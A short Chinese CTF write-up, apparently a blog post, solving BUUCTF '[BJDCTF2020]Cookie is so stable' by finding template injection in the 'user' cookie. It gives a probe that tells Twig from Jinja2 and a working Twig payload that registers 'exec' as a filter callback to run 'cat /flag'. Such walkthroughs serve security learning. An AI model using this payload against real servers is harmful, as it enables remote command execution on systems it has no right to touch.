web buuctf [BJDCTF2020]Cookie is so stable

1.

2.查看hint页面源代码,提示关键在cookie

3.用admin登录,之后刷新抓包,发现cookie:

UM_distinctid=17df970999f4d4-04704e6be3f571-4c3e207f-e1000-17df97099a05d4; PHPSESSID=c8ca1d92349dffef8879d35029b3eeb0; user=admin

第一个是友盟的,主要看cookie中的user

4.cookie中的注入,我第一个想法就是ssti(模板注入)

payload:user={{2*3}}

输入{{7*'7'}},返回49表示是 Twig 模块(ps:返回7777777表示是 Jinja2 模块)

5.在Twig来说,其变量_self暴露了Twig内部的许多API,可以利用payload:

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}

这个记住就好了,是回调执行命令

得到flag 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值